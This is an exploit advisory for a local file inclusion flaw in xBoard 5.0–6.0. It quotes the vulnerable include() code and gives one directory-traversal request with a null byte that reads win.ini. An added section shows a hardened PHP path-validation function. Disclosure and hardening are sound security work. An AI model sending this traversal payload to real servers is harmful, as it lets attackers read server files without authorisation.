
xBoard 5.0/5.5/6.0 Local File Inclusion

Author: TUNISIAN CYBER, Published: 11-12-2013
[+] Author: TUNISIAN CYBER
[+] Exploit Title: xBoard 5.0/5.5/6.0 Local File Inclusion
[+] Date: 11-12-2013
[+] Category: WebApp
[+] Vendor: http://sourceforge.net/projects/xboard/
[+] Tested on: Win7, Ubuntu 13.04

########################################################################################
I/Vulnerable code: view.php
v5.0:
49: if (file_exists("$directory/$post.html"))
50: {
51: include("$directory/$post.html");

v5.5:
28: if (file_exists("$directory/$post.html"))
29: {
30: include("$directory/$post.html");

v6.0:
27: if (file_exists("$directory/$post.html"))
28: {
29: include("$directory/$post.html");

II/Exploit and p.0.c:
http://{host}/xboard/view.php?post=../../../../../../../../../../windows/win.ini%00
p.0.c: http://oi44.tinypic.com/2uxyaz9.jpg

III/Solution:
Upgrade to v6.5
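
The include() in view.php builds its path from the `post` query parameter, so a hardened form validates the name and confirms the resolved path stays inside the posts directory. This is an added example, not xBoard's code and not the v6.5 fix; `resolve_post()` is a hypothetical helper, and it assumes `$directory` is set server-side and that posts are static HTML.

```php
<?php
// Added example, not xBoard code; resolve_post() is a hypothetical helper.
// Assumes $directory is set server-side and $post is the `post` query parameter.
function resolve_post(string $directory, string $post): ?string
{
    // 1. Allowlist the name: rejects "../", "/", "\" and NUL bytes outright.
    if (!preg_match('/\A[A-Za-z0-9_-]{1,64}\z/', $post)) {
        return null;
    }
    // 2. Canonicalise both paths; realpath() returns false if a path does not exist.
    $base = realpath($directory);
    $path = realpath($directory . DIRECTORY_SEPARATOR . $post . '.html');
    if ($base === false || $path === false) {
        return null;
    }
    // 3. Containment: the resolved file must sit under the base directory
    //    (also catches symlinks that point out of it).
    $prefix = $base . DIRECTORY_SEPARATOR;
    if (strncmp($path, $prefix, strlen($prefix)) !== 0) {
        return null;
    }
    return is_file($path) ? $path : null;
}

// Constructed demo: a temporary posts directory holding one post.
$directory = sys_get_temp_dir() . DIRECTORY_SEPARATOR . 'xboard_demo_' . getmypid();
@mkdir($directory);
$demoFile = $directory . DIRECTORY_SEPARATOR . 'hello.html';
file_put_contents($demoFile, '<p>hello</p>');

// Constructed inputs: one valid name, the request shape from section II, and two misses.
$samples = ['hello', "../../../../windows/win.ini\0", '..\\..\\boot', 'missing'];
foreach ($samples as $post) {
    $path = resolve_post($directory, $post);
    printf("%-40s => %s\n", json_encode($post), $path === null ? 'rejected' : 'served');
}

unlink($demoFile);
rmdir($directory);

// In view.php the include would then become:
//   $path = resolve_post($directory, $_GET['post'] ?? '');
//   if ($path !== null) { readfile($path); } else { http_response_code(404); }
// readfile() outputs the file without executing it as PHP (assumes static HTML posts).
```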

./3nD
########################################################################################
Greets to: XMaXtn, N43il HacK3r, XtechSEt
